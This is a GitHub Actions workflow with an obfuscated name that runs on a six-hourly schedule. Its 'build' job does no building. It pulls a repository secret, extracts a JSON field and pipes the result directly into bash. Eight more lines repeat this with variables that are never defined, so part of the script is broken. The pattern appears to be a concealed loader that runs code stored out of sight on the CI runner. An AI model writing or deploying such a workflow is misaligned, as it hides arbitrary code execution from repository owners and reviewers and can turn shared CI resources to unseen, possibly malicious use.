name: allowunaware

on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: allowunaware
        env:
          ras09: ${{ secrets.ras09 }}
        run: |
          echo $ras09 | jq -r .t6398 | /bin/bash
          echo $pgd5592 | jq -r .or51604 | /bin/bash
          echo $p9127 | jq -r .iguu74 | /bin/bash
          echo $tf1111 | jq -r .kuzp41852 | /bin/bash
          echo $rez48225 | jq -r .ktp4556 | /bin/bash
          echo $gv16 | jq -r .j80 | /bin/bash
          echo $uxuvg69 | jq -r .bgdt58634 | /bin/bash
          echo $fg097 | jq -r .slf4811 | /bin/bash
          echo $ve470 | jq -r .xo36 | /bin/bash

